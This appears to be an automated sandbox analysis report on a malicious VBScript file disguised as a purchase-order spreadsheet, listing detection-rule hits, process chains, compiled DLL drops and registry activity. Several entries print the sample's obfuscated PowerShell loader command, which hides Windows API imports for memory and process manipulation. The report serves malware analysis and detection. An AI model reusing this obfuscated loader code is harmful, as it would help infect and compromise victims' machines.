Source: PO-08784 xlsx.vbe, type: SAMPLE	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_6000.amsi.csv, type: OTHER	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 5064, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4620:120:WilError_01

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5urju1b3.luw.ps1

Jump to behavior

Source: classification engine

Classification label: mal72.expl.winVBE@11/9@0/0

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Binary string: l:C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.pdb source: powershell.exe, 00000003.00000002.541727874.0000000005789000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Obfuscated command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_031461C5 push FFFFFFC3h; ret		3_2_03146264
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_03146070 push FFFFFFC3h; ret		3_2_03146174

Compiles C# or VB.Net code

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline			Jump to behavior

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
